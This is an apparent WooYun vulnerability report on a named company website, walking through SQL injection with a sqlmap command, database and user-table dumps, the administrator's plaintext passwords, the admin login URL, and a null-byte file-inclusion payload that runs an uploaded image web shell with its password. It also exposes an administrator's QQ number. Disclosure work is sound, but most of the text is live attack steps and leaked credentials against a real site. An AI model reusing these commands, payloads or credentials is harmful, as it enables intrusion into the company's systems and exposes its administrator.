当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150851

漏洞标题:迪讯信息技术公司SQL注入/文件包含/getshell

相关厂商:迪讯信息技术公司

漏洞作者: 冷白开。

提交时间:2015-11-02 14:06

修复时间:2015-12-17 14:08

公开时间:2015-12-17 14:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

迪讯信息技术公司SQL注入/文件包含/getshell

详细说明:

sqlmap.py -u "http://www.dcominfo.com/product/index.php?type_id=9" --dbs

1.png

available databases [2]:
[*] dcominfo
[*] information_schema
Database: dcominfo
[10 tables]
+---------------------------+
| ruideman_cn_archives      |
| ruideman_cn_news          |
| ruideman_cn_news_type     |
| ruideman_cn_partners      |
| ruideman_cn_partners_type |
| ruideman_cn_pictures      |
| ruideman_cn_product       |
| ruideman_cn_product_type  |
| ruideman_cn_user          |
| ruideman_cn_xuhao         |
+---------------------------+
Database: dcominfo
Table: ruideman_cn_user
[37 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| answer            | varchar(40)      |
| area              | varchar(6)       |
| birthday          | date             |
| city              | varchar(6)       |
| clicktimes        | int(10) unsigned |
| company_type      | tinyint(3)       |
| education_type    | tinyint(3)       |
| email             | varchar(40)      |
| good_evaluate     | float            |
| integrity_grade   | tinyint(3)       |
| is_check          | tinyint(1)       |
| lastlog           | datetime         |
| marriage_type     | tinyint(3)       |
| nick_name         | varchar(50)      |
| pass              | tinyint(4)       |
| password          | varchar(32)      |
| province          | varchar(6)       |
| question          | varchar(40)      |
| real_name         | varchar(30)      |
| recommend_user_id | int(10)          |
| recommendflag     | tinyint(1)       |
| session_id        | char(32)         |
| sex               | tinyint(3)       |
| structon_tb       | text             |
| submit_date       | datetime         |
| thumbnail         | varchar(100)     |
| topflag           | tinyint(1)       |
| total_credit      | int(10)          |
| user_grade        | tinyint(1)       |
| user_group        | smallint(1)      |
| user_id           | int(10) unsigned |
| user_ip           | varchar(23)      |
| user_money        | float            |
| user_name         | varchar(30)      |
| user_popedom      | varchar(200)     |
| user_type         | tinyint(1)       |
| vocation_type     | tinyint(3)       |
+-------------------+------------------+
Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+-----------+
| user_name |
+-----------+
| admin     |
+-----------+
Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+----------+
| password |
+----------+
| ab0528   |
+----------+


后台

http://www.dcominfo.com/admin/login.php


刚那管理员又去改密码了。。。乌云。。。可是密码还是明文的。。。
新密码:DcomXGA0528

4.png


撸进后台
然后进行上传shell
http://www.dcominfo.com/wap/detail.php?mod=/uploadfile/product/s/1/46_1446271963.jpg%00
密码1

2.png


已经getshell

漏洞证明:

综上

修复方案:

已经和管理员沟通过,他们会来认领的,求过,管理员QQ:2250832217

3.png

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝